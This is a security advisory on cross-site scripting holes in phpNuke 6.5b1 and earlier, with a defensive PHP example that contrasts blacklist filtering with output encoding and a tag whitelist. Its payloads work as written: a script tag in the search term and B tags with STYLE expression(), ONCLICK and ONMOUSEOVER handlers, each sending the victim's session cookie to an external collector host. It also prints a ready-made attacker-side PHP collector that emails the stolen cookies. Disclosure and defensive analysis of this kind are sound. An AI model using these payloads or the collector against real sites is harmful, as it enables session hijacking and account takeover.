phpNuke is a popular and very complex content management system that runs on UNIX, Mac, and Windows systems with a MySQL or similar backend database. Many of its modules contain serious cross-site scripting vulnerabilities that allow attackers to steal session cookies, hijack or disable user accounts, and possibly gain administrative privileges. Gaining such privileges could assist further compromise of the susceptible system.
Credit:
The information has been provided by Matthew Murphy.
Vulnerable systems:
* phpNuke 6.5b1 and prior
I. Search Module Vulnerability
The search module of phpNuke applies no filtering at all to the search term when it echoes it back on the "Results for x..." page. The term is placed in the HTML unencoded, so any markup in it is parsed by the victim's browser, and the module is susceptible to cross-site scripting via a query as simple as the following (the asterisk in SCR*IPT is a defanging character and not part of the query):
<SCR*IPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurphy@kc.rr.com&ref="+document.URL+"cookie="+document.cookie;
II. Multiple Module Extended Tag Vulnerabilities
phpNuke does a decent job of stripping known malicious tags such as <SCRIPT>, but its filter is a tag blacklist: it does not take into account that even "safe" tags can carry malicious attributes. Event handlers (ONCLICK, ONMOUSEOVER, and the rest) execute script in every browser, and a STYLE attribute containing a CSS expression() executes script in Internet Explorer. This enables cross-site scripting against the PM module, the Discussion module, the News module, and in fact any module that accepts user-supplied HTML for an article, message, or comment. Each of the following payloads passes the filter as a plain <B> tag:
<B STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fetch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'cookie=\'+document.cookie'))">Bold text -- or an attack?</B>
<B ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>
<B ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphy@kc.rr.com&ref='+document.URL+'cookie='+document.cookie">Keep Away!</B>
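The following is an added example and is not code from phpNuke or from the advisory. It contrasts the tag-blacklist style of filtering described in section II with the two fixes a practitioner would apply: output encoding for the search heading of section I, and a tag whitelist that restores only bare, attribute-free tags for comments, messages and articles. All function names, the collector hostname and the sample inputs are this example's own.

```php
<?php
// Added example, not phpNuke's own filtering code. Function names, the
// collector.example host and the sample inputs are assumptions for the demo.

// Blacklist in the spirit of the advisory: removes <script> and a few other
// well-known tags, but any other tag passes through with all its attributes.
function blacklist_filter(string $html): string
{
    return preg_replace('#</?(script|iframe|object|embed|applet)\b[^>]*>#i', '', $html);
}

// Search page: the query is data, never markup, so encode it before it is
// placed in the "Results for x..." heading.
function render_search_heading(string $query): string
{
    return 'Results for ' . htmlspecialchars($query, ENT_QUOTES, 'UTF-8') . '...';
}

// Comment/article body: encode everything first, then restore only allowed
// tags that carry no attributes at all. A <B ONCLICK=...> or <B STYLE=...>
// tag never matches, so it stays encoded and is displayed as literal text.
function whitelist_filter(string $html): string
{
    $allowed = ['b', 'i', 'u', 'em', 'strong', 'p', 'br'];
    $out = htmlspecialchars($html, ENT_QUOTES, 'UTF-8');
    foreach ($allowed as $tag) {
        // "&lt;b&gt;", "&lt;/b&gt;" and "&lt;br/&gt;" are restored; nothing else is.
        $out = preg_replace('#&lt;(/?)' . $tag . '\s*/?&gt;#i', '<$1' . $tag . '>', $out);
    }
    return $out;
}

// Constructed inputs modelled on the advisory's payloads (collector URL is a placeholder).
$search  = '<script>location.href="http://collector.example/fetch.php?c="+document.cookie</script>';
$comment = '<B ONMOUSEOVER="location.href=\'http://collector.example/fetch.php?c=\'+document.cookie">Keep Away!</B>'
         . ' and <b>plain bold</b>';

echo "Search, unfiltered (section I):   Results for $search...\n";
echo "Search, encoded:                  " . render_search_heading($search) . "\n\n";
echo "Comment, blacklist (section II):  " . blacklist_filter($comment) . "\n";
echo "Comment, whitelist:               " . whitelist_filter($comment) . "\n";
```

Run it with `php` from the command line. The blacklist line prints the ONMOUSEOVER tag exactly as submitted, which is the section II condition; the whitelist line prints that tag entity-encoded, so a browser would show it as text, while the attribute-free <b>plain bold</b> is restored as markup. The design point is that the whitelist rebuilds each allowed tag from its name alone instead of trying to enumerate dangerous attributes, so new handler names or browser-specific tricks like expression() need no filter update.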
Exploit Script
<?php
// Attacker-side collector referenced by the payloads above: receives the
// victim's cookie and page URL via the query string, mails the cookie to
// the address in "email", then sends the victim back to the page in "ref".
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
    // Redirect to the URL as received. The original wrapped it in urlencode(),
    // which turns "http://..." into "http%3A%2F%2F..." and yields an unusable
    // Location header, so the victim would not be sent back to the page.
    header("Location: ".$_GET["ref"]);
}
?>
Vendor Response:
Matthew Murphy has contacted www.phpnuke.org through a private message to the user "nukelite", including an example exploit. If anyone knows a more reliable contact for the project, please use it, as a private message is unlikely to be the best route of contact. Matthew Murphy expects that future BETA releases will eliminate this vulnerability.